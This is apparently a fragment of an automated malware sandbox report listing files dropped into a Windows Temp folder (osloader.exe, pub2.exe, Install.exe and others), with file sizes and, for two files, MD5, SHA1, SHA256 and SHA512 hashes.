    • C:\Users\Admin\AppData\Local\Temp\osloader.exe

      Filesize

      591KB

      MD5

      e2f68dc7fbd6e0bf031ca3809a739346

      SHA1

      9c35494898e65c8a62887f28e04c0359ab6f63f5

      SHA256

      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

      SHA512

      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

    • C:\Users\Admin\AppData\Local\Temp\pkts.url

      Filesize

      117B

      MD5

      df4a7f07705560dae41b04d261e3d913

      SHA1

      d393b4b01f8bbe04ce0f6723d3bbc9d801b7045a

      SHA256

      245ff85e1e3801027ad43559df4894ae6c8008307efd8d06fa62fc2b0ab475a5

      SHA512

      8a4e10c7fbef633b56d4f219a2988699f1bdaeac16582430d612028f23fc0c2b9960dc8f02941e9012be08e5af7fc08a965b7e244a75d5a7d33387777bf4f6dc

    • C:\Users\Admin\AppData\Local\Temp\pub2.exe

      Filesize

      274KB

    • C:\Users\Admin\AppData\Local\Temp\~DFD0D6AF50D7B6960B.TMP

      Filesize

      16KB

    • \Users\Admin\AppData\Local\Temp\Files.exe

      Filesize

      975KB

    • \Users\Admin\AppData\Local\Temp\Folder.exe

      Filesize

      712KB

    • \Users\Admin\AppData\Local\Temp\Info.exe

      Filesize

      4.3MB

    • \Users\Admin\AppData\Local\Temp\Install.exe

      Filesize

      1.4MB

    • \Users\Admin\AppData\Local\Temp\Lsr.exe

      Filesize

      1.5MB

    • \Users\Admin\AppData\Local\Temp\Updbdate.exe

      Filesize

      332KB

    • \Users\Admin\AppData\Local\Temp\md9_1sjm.exe

      Filesize

      921KB
